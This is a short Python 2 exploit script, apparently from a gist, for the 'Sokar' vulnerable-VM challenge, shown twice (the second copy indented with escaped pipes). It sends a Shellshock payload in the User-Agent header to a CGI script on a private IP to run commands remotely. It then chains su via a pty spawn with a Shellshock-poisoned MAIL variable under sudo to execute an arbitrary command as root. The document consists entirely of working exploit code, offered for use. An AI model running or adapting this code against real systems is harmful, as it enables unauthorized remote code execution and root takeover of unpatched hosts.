leonjza/root.py

## root.py
#!/usr/bin/python

# 2015 Leon Jacobs
# sokar remote root command execution

import requests
import sys

if len(sys.argv) < 2:

    print " * Usage %s <cmd>" % sys.argv[0]
    sys.exit(1)

# Grab the command from the args
command = sys.argv[1].strip()

# prep to shock the lime script
root_command = """echo "N" | sudo MAIL=\\"() { :;}; %s;\\" /home/bynarr/lime""" % command

# prep to exec the command as bynarr
payload = """/usr/bin/python -c "import time; time.sleep(1); print 'fruity'" | /usr/bin/python -c "import pty; pty.spawn(['/bin/su','-c','%s', 'bynarr']);" """ % root_command

# be verbose about the full command
print " * Executing %s\n" % payload

# Send the sploit
headers = { "User-Agent": "() { :;};echo;%s" % payload }
print requests.get("http://192.168.217.163:591/cgi-bin/cat", headers=headers).text.strip()
	#!/usr/bin/python

	# 2015 Leon Jacobs
	# sokar remote root command execution

	import requests
	import sys

	if len(sys.argv) < 2:

	print " * Usage %s <cmd>" % sys.argv[0]
	sys.exit(1)

	# Grab the command from the args
	command = sys.argv[1].strip()

	# prep to shock the lime script
	root_command = """echo "N" \| sudo MAIL=\\"() { :;}; %s;\\" /home/bynarr/lime""" % command

	# prep to exec the command as bynarr
	payload = """/usr/bin/python -c "import time; time.sleep(1); print 'fruity'" \| /usr/bin/python -c "import pty; pty.spawn(['/bin/su','-c','%s', 'bynarr']);" """ % root_command

	# be verbose about the full command
	print " * Executing %s\n" % payload

	# Send the sploit
	headers = { "User-Agent": "() { :;};echo;%s" % payload }
	print requests.get("http://192.168.217.163:591/cgi-bin/cat", headers=headers).text.strip()